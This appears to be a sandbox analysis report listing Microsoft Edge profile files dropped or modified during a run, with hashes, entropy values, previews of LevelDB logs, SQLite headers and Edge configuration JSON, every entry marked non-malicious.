Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):25012
Entropy (8bit):5.566919002467983
Encrypted:false
SSDEEP:768:nTffQHWjvW5wFZf4XS8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPmWIY1w0rwXJpFtuc:n7YH+vWaFZf2Su1jajsWt1tT
MD5:ED02A1871812F1497C6C6F565964D481
SHA1:CFE4CD7190FBF2DA09DFEA9102802EC8672C6866
SHA-256:794FC618C5A7288315A5CD7601825846CB1C52790686F97A674D1F7647336BE4
SHA-512:BD29C1ED13BD9408115F318D7592DE8A69034AF4FDCAD660EE0214EFC6254F4F27202CBA479F6CC5E42BEC3D215E98CB00401823C5C84CC1619C315B9D9E4515
Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380536355309336","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380536355309336","location":5,"ma
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):16
Entropy (8bit):3.2743974703476995
Encrypted:false
SSDEEP:3:1sjgWIV//Uv:1qIFUv
MD5:46295CAC801E5D4857D09837238A6394
SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:false
Preview:MANIFEST-000001.
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):33
Entropy (8bit):3.5394429593752084
Encrypted:false
SSDEEP:3:iWstvhYNrkUn:iptAd
MD5:F27314DD366903BBC6141EAE524B0FDE
SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
Malicious:false
Preview:...m.................DB_VERSION.1
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):16
Entropy (8bit):3.2743974703476995
Encrypted:false
SSDEEP:3:1sjgWIV//Uv:1qIFUv
MD5:46295CAC801E5D4857D09837238A6394
SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:false
Preview:MANIFEST-000001.
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):313
Entropy (8bit):5.257954903541866
Encrypted:false
SSDEEP:6:iOHlv1N723oH+Tcwtp3hBtB2KLld0BL+q2PN723oH+Tcwtp3hBWsIFUv:7ZaYebp3dFLIYvVaYebp3eFUv
MD5:A6A29DF6350D22B843C195D33F23B0FF
SHA1:FDFF8AD71FC4C7A5D0699D1EE255E2E42AE453D7
SHA-256:406C653DFADA6A590815DCB8F38C9AFADA98859BBBAF2765274B572554A2696B
SHA-512:F5C444846E9BA438593FC70D80AD5A644BD26899D5CC4520546A542BBF3E8366D61B228FFF956AAA09A1F59ED2684BE0C05F59CAD78B1F8B5006F1DBE9CDF106
Malicious:false
Preview:2025/01/05-02:39:24.074 1dd8 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2025/01/05-02:39:24.163 1dd8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:OpenPGP Secret Key
Category:dropped
Size (bytes):41
Entropy (8bit):4.704993772857998
Encrypted:false
SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:false
Preview:.|.."....leveldb.BytewiseComparator......
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:modified
Size (bytes):2163821
Entropy (8bit):5.222866148985454
Encrypted:false
SSDEEP:24576:IbPMZpV3fI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:IbkZpV3fx2mjF
MD5:149BB9FD83F19F6CE1142CF6FDB6B9BB
SHA1:DC156191ABC1FAA32F21C60F60AF556A4E2A7514
SHA-256:62C73DCD9283DBE0147A68948C2B0CAE0AB388C8085662A1AD69D35D26696BF7
SHA-512:0AF2FAF0AD83B18E5F9CC3A04FC6E4CFAD42430314C98BD30717BFDFBEC796CE1EF76795DA016265055C671876C4CDF6392F1A5036AF4572B9D798DD47B90FD7
Malicious:false
Preview:...m.................DB_VERSION.1.f.+.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340960289901340.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):340
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.087796543097942
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHiVDMq2PN723oH+Tcwt9Eh1tIFUttyZmwDYVDPkwON723oH+Tcwt9Eh15LJ:7CpMvVaYeb9Eh16FUtY/8VDP5OaYeb9O
                                                                                                                                                                                                                                                                                                                            MD5:78CF45EB57B26F2DC690D7C3927BCC74
                                                                                                                                                                                                                                                                                                                            SHA1:D9F1C3DE4E1A0874EF69C5F1DEAD5FA534B23C0E
                                                                                                                                                                                                                                                                                                                            SHA-256:3C260841A322DB245BD2DFC8AA69013B81627F797ADA99DBA3C0402EAE6B9819
                                                                                                                                                                                                                                                                                                                            SHA-512:4234759B8FA217768FD91DC634500CDC8C6D88F981C0537B2CEACE8CD3541F56A4D68955FD775CE103BFF61B6CF85168CAC1973011E7C7A7E474D136A4AB55B4
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:23.392 20f4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2025/01/05-02:39:23.394 20f4 Recovering log #3.2025/01/05-02:39:23.398 20f4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):340
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.087796543097942
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHiVDMq2PN723oH+Tcwt9Eh1tIFUttyZmwDYVDPkwON723oH+Tcwt9Eh15LJ:7CpMvVaYeb9Eh16FUtY/8VDP5OaYeb9O
                                                                                                                                                                                                                                                                                                                            MD5:78CF45EB57B26F2DC690D7C3927BCC74
                                                                                                                                                                                                                                                                                                                            SHA1:D9F1C3DE4E1A0874EF69C5F1DEAD5FA534B23C0E
                                                                                                                                                                                                                                                                                                                            SHA-256:3C260841A322DB245BD2DFC8AA69013B81627F797ADA99DBA3C0402EAE6B9819
                                                                                                                                                                                                                                                                                                                            SHA-512:4234759B8FA217768FD91DC634500CDC8C6D88F981C0537B2CEACE8CD3541F56A4D68955FD775CE103BFF61B6CF85168CAC1973011E7C7A7E474D136A4AB55B4
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:23.392 20f4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2025/01/05-02:39:23.394 20f4 Recovering log #3.2025/01/05-02:39:23.398 20f4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):28672
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.4624717951077544
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBuTrcW:TouQq3qh7z3bY2LNW9WMcUvBuTrc
                                                                                                                                                                                                                                                                                                                            MD5:50517CF353478F0CC5A419610D0F35B3
                                                                                                                                                                                                                                                                                                                            SHA1:4E6798F505684A86774E5ADE362F6FF4A2B52971
                                                                                                                                                                                                                                                                                                                            SHA-256:AF150CF1B03394426B080F1991DA8A05B7D6D39A2E5B4E3647300EC20562D14D
                                                                                                                                                                                                                                                                                                                            SHA-512:8F10A14922A5C7AC8514A6076F5625CBA8154D50873785C75ACFF9D4A7687E6B702F051D1DDF3671C2A42530776BB5BAB7A5C6FA653B1CFEB7EBFA7598E3A2E6
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):10240
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                                                            MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                                                            SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                                                            SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                                                            SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):270336
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.0018164538716206493
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2zEZl5tvl/:/M/xT02zK
                                                                                                                                                                                                                                                                                                                            MD5:62D45392E36171AF9107270C4E6180BB
                                                                                                                                                                                                                                                                                                                            SHA1:04BF369979AA44CD588323C518497DE98F223672
                                                                                                                                                                                                                                                                                                                            SHA-256:004896A68BD78C0619794E3FC8E44D20C1FB98694336D31BC821C97025BF9374
                                                                                                                                                                                                                                                                                                                            SHA-512:CF93E8DD959FC260624E6BC29DA0C745281D85BB0AAEDE312CA051638AB84A5E0AF9733B8F6364E4D385350F85FB92A71DCCB60629F49DD617A5724485264A60
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):352
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.16353398067036
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHfio1Vq2PN723oH+TcwtnG2tMsIFUttfio1gZmwDfio1IkwON723oH+TcwtnGg:7/5/vVaYebn9GFUt95y/z5+5OaYebn9b
                                                                                                                                                                                                                                                                                                                            MD5:AB85783E725949D7584966E33C73773A
                                                                                                                                                                                                                                                                                                                            SHA1:98504ED790E3C0A410F6D82AEE1A45D81AE0D1B3
                                                                                                                                                                                                                                                                                                                            SHA-256:24FCE86E4584F9DC05B16D2F384762A597E33349EF694527864E19574FBC466C
                                                                                                                                                                                                                                                                                                                            SHA-512:BFC04E4B399CAB0FD75036556B28CCE25B7B433BB72440F99F792C2F4CC68F808E5375FB6E198BCF1B38A492B576735EACA04BE1182E32EB815F9EABA75C1FC6
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:15.368 1de0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2025/01/05-02:39:15.368 1de0 Recovering log #3.2025/01/05-02:39:15.368 1de0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):352
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.16353398067036
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHfio1Vq2PN723oH+TcwtnG2tMsIFUttfio1gZmwDfio1IkwON723oH+TcwtnGg:7/5/vVaYebn9GFUt95y/z5+5OaYebn9b
                                                                                                                                                                                                                                                                                                                            MD5:AB85783E725949D7584966E33C73773A
                                                                                                                                                                                                                                                                                                                            SHA1:98504ED790E3C0A410F6D82AEE1A45D81AE0D1B3
                                                                                                                                                                                                                                                                                                                            SHA-256:24FCE86E4584F9DC05B16D2F384762A597E33349EF694527864E19574FBC466C
                                                                                                                                                                                                                                                                                                                            SHA-512:BFC04E4B399CAB0FD75036556B28CCE25B7B433BB72440F99F792C2F4CC68F808E5375FB6E198BCF1B38A492B576735EACA04BE1182E32EB815F9EABA75C1FC6
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:15.368 1de0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2025/01/05-02:39:15.368 1de0 Recovering log #3.2025/01/05-02:39:15.368 1de0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.613604964045737
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:TLs9pRSJDBJuqJSEDNvrWjJQ9Dl9np59yDLgHFUxOUDaaTXubHa7mWppMAlaiNrc:TLapR+DDNzWjJ0npnyXKUO8+jmpEymL
                                                                                                                                                                                                                                                                                                                            MD5:56851450E7F0D243FC021BDAEEED78A6
                                                                                                                                                                                                                                                                                                                            SHA1:15A3E6CBBDDC87C7AFACE05944E33A811C7F5F72
                                                                                                                                                                                                                                                                                                                            SHA-256:DFC7312CD2797825895E923B8B053D9DD414E15B1779488716D10E0874A8D43F
                                                                                                                                                                                                                                                                                                                            SHA-512:2B24EBC6FE5ACAA0373ABB510FFF4D63F51EC587166951EBA7A94233DBDEA4FF3569A63DBBD399EF6B718B69FC27240D5AF88387AFCC3018DFD868D3C950BCDF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):375520
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.354070221917899
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6144:7A/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:7FdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                                                            MD5:7560C9330BDD68B89D283B689B946B68
                                                                                                                                                                                                                                                                                                                            SHA1:E81864704C36F1F5B06758CC831BFF6AEC762F0C
                                                                                                                                                                                                                                                                                                                            SHA-256:C648ADFC82CFDA81C92DB62F70AF9F96F6B2C01586D10ADC9347C7AC45CB5128
                                                                                                                                                                                                                                                                                                                            SHA-512:FF2520DBFD07DF423EC139286614A09225010D3AA9D4AFE88E4C19D7C75FC3A804179B08D1E6087CAE44E134E3D6BD99E7D3B3E191E8E74ED16E5788FDFA7EE1
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:...m.................DB_VERSION.1&.x3q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13380536364816092..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):315
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.140662694291286
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHS+UIoM1N723oH+Tcwtk2WwnvB2KLlde5yq2PN723oH+Tcwtk2WwnvIFUv:7y+UbsaYebkxwnvFLS8vVaYebkxwnQF2
                                                                                                                                                                                                                                                                                                                            MD5:97B150212D9141E3E34BC3451E8D055E
                                                                                                                                                                                                                                                                                                                            SHA1:5D977AD7D0382F079470857CAD8E097D92CCB179
                                                                                                                                                                                                                                                                                                                            SHA-256:054D8F3AA74B83085C16CAE2F1A29CC832FD9D1D1362717297D35C0709DB3A17
                                                                                                                                                                                                                                                                                                                            SHA-512:A7D39169D94F440F8F4B0C4D4536A0914AE38A01060CCB2AB6F7AFF1FBE48A987BABD72B9250F05572767532862023C82CD8AA6DC7ABDFB8A0BE1E0AC077FB0E
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:23.410 2114 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2025/01/05-02:39:23.839 2114 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):41
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                                                                                                            Size (bytes):358860
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.32461301038395
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Rf:C1gAg1zfvH
                                                                                                                                                                                                                                                                                                                            MD5:13830F2AC4F461AB1AECF0F7236D7917
                                                                                                                                                                                                                                                                                                                            SHA1:8980972F0FCAF2C2E8E349E0A1FA957819673862
                                                                                                                                                                                                                                                                                                                            SHA-256:382D16E47B534F387C8A9FBE421056E9BE55DA5159E9D398015E252519E4EA79
                                                                                                                                                                                                                                                                                                                            SHA-512:5450245C85E6F18C3E437658C54C3309A1E439C6F603D9A99385807059553F424A91D62589C738824B8799D95414BAD7D2F3A5BCA497D22AF69D9FB4D4F20236
                                                                                                                                                                                                                                                                                                                            Malicious:false
